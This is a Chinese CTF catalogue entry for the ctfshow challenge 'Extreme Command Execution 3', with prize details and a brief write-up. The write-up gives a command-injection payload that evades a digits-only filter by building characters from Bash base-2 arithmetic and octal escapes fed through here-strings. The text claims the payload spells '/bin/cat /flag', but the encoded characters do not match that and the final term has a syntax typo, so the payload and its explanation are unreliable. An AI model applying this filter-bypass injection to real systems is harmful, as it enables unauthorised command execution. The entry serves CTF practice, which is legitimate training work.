极限命令执行3
| ID: | 4802 |
|---|---|
| 标题: | 极限命令执行3 |
| 描述: | * 挑战难度:**★★★** * 本周擂主:g4 * 挑战奖励:截至2023年2月12日晚8点,做出来的人平分奖金(做出来的人越多,奖金越低,反之,越高) * 关卡奖金:**100人民币** |
| 类型: | 每周大挑战.极限命令执行 |
| 网站: | ctfshow |
| 题目链接: | https://ctf.show/api/v1/challenges/3949 |
| 赛事: | 极限命令执行 |
| 年度: | None |
| Flag值: | 题目答案文本 |
| writeup: |
验证后的网址 极限命令执行3的解题关键在于通过Bash的整数表达方式构造被过滤的字符。题目限制仅允许使用数字0、1及部分符号,需利用位运算(如1<<1生成2)和八进制/十六进制表示法拼接命令。例如,通过$((1<<1))#10011010生成ASCII码对应的字符,再结合here-string语法(<<<)执行命令。具体payload示例为: ctf_show=$0<<<$0\<\<\<\$\'\\$(($((1<<1))#10001111))\\$(($((1<<1))#10001101))\\$(($((1<<1))#10100100))\\$(($((1<<1))#101000))\\$(($((1<<1))#111001))\\$(($((1<<1))#10010010))\\$(($(1<<1))#10001111))\' 该payload通过二进制转换构造/bin/cat /flag的ASCII码并执行 5。 https://www.cnblogs.com/GTL-JU/p/17128363.html |